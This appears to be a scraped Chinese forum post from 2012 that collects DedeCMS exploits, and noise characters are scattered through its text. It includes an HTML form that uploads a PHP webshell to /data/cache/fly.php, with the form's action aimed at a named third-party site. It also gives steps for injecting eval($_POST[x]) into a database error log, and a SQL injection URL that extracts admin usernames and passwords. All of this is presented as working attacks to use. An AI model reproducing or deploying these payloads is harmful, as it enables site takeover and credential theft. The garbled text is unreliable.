- M: \+ N* q/ }- A2 Z4 M% ?! U织梦(Dedecms)select_soft_post.php页面变量未初始漏洞* [; {" g' G! ]! W2 u/ o
<html>
; h2 G1 j* r1 |7 f<head>
) \% Y+ o" a; D5 }8 G0 x0 F* F& u8 W3 J<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>, n* `8 s( w; a/ T- Y: a
</head>
( N) A$ L/ I; e, t5 _, C" i<body style="FONT-SIZE: 9pt">6 j+ e+ S' G4 I& \
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
( }) G8 _* u3 ]6 b9 R<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>- B1 i' c) E+ M2 m9 V
<input type='hidden' name='activepath' value='/data/cache/' />, b0 w3 f6 J! S% B, f/ |
<input type='hidden' name='cfg_basedir' value='../../' /># T% j V' y9 x9 t& H6 b2 X+ B: [
<input type='hidden' name='cfg_imgtype' value='php' />7 K% u" R) C: n ]
<input type='hidden' name='cfg_not_allowall' value='txt' />) Z9 Q$ F& J' ~; P1 m" D! D
<input type='hidden' name='cfg_softtype' value='php' />
* V) c7 K- Z5 l; C1 Q<input type='hidden' name='cfg_mediatype' value='php' />! K0 l7 G) @0 q, M1 v
<input type='hidden' name='f' value='form1.enclosure' />
$ J" L6 C; s) L% V! O% s<input type='hidden' name='job' value='upload' />, I$ E8 o. B# F" i& ?1 L
<input type='hidden' name='newname' value='fly.php' />: k4 I) m( D0 g& M1 ^* z; p0 x
Select U Shell <input type='file' name='uploadfile' size='25' />8 u* O9 }) D/ v/ @9 {
<input type='submit' name='sb1' value='确定' />
' `/ q: g, N1 r! c! ^' f% r1 r</form>
4 o6 k0 F2 M" O<br />It's just a exp for the bug of Dedecms V55...<br />
' ^7 K: f8 P9 e' }4 y% h8 PNeed register_globals = on...<br />
- o, S. P- c4 F' fFun the game,get a webshell at /data/cache/fly.php...<br />
: s% X8 \& f. y v0 s6 D8 ^ Z</body>
* R% J$ H9 N; B; g3 [' L: b</html>& X# M0 Y0 c# ]2 g* e( |
7 ~0 N9 @" N' i9 h
" \ S5 l2 V, o
7 v: W! r' G& l/ \& r2 g: g
% |, @+ c4 `( N; g' X, y8 [0 U y8 b, I! L
& B' h6 S0 s0 s
) v/ L' v/ z) W% f1 b
/ z5 K7 x9 H) ~- C2 O5 h6 u" {, D6 x5 L9 c# [& P! w3 X& t8 V( ?8 U
3 Q% G& ?0 y% x# h2 v' T# v% O织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
5 F5 x' T7 X9 J9 `8 [利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
# y9 i" e1 k. P _0 g1. 访问网址:
3 ]. r% R" Q, z5 y; w& m3 ^3 xhttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>3 ]# H) [4 b2 b4 C% Q1 t
可看见错误信息6 G' k {4 Q; s) {& \7 I
/ Z7 e7 }! x' `0 M- Q8 ]
) p% K# c+ F" `3 F
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。, S$ W/ A( }* p1 s- ^ l* C
int(3) Error: Illegal double '1024e1024' value found during parsing! j' f3 r" C2 O5 h
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
" N* X0 h0 C* [+ l7 J2 V
1 j$ Y7 p5 R2 n9 O9 ~7 L+ T7 v) C' G
* o( R l% k- G$ I7 K3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
* g8 w" K( X8 p0 v6 ]+ J: j+ K' _& _; s
4 u5 ]7 g/ p7 c* I<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>8 Q( d5 Q) b: d
- Q4 z6 p( c: l$ J6 h6 j( \
! z" L4 d g. e. c按确定后的看到第2步骤的信息表示文件木马上传成功.6 f. ?' |- q& Z3 ?* B
6 @1 q, q$ M# l( m
, Y: T* u' d- p8 Q: d
: T5 l3 m* z+ w) T. H- l$ V
# ~, x7 t7 y/ l/ o# G- g$ Z- s- }. ?
( q6 L1 f8 I' N" I0 x5 u# ], z" h* p( \2 W6 ^ B7 S9 y+ J
, X7 ^3 A5 X" v0 a. R5 R$ {( ~! _
" [7 S: R, q7 N: B, I: `
! a6 g0 t6 Z0 Y% `: a- `# ^
2 x" ]" }5 j2 k# j, h' B) y' x. b
7 e8 d5 s7 z2 p) ~7 k/ j
织梦(DedeCms)plus/infosearch.php 文件注入漏洞" E' C* c3 q6 k1 z+ @- a
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对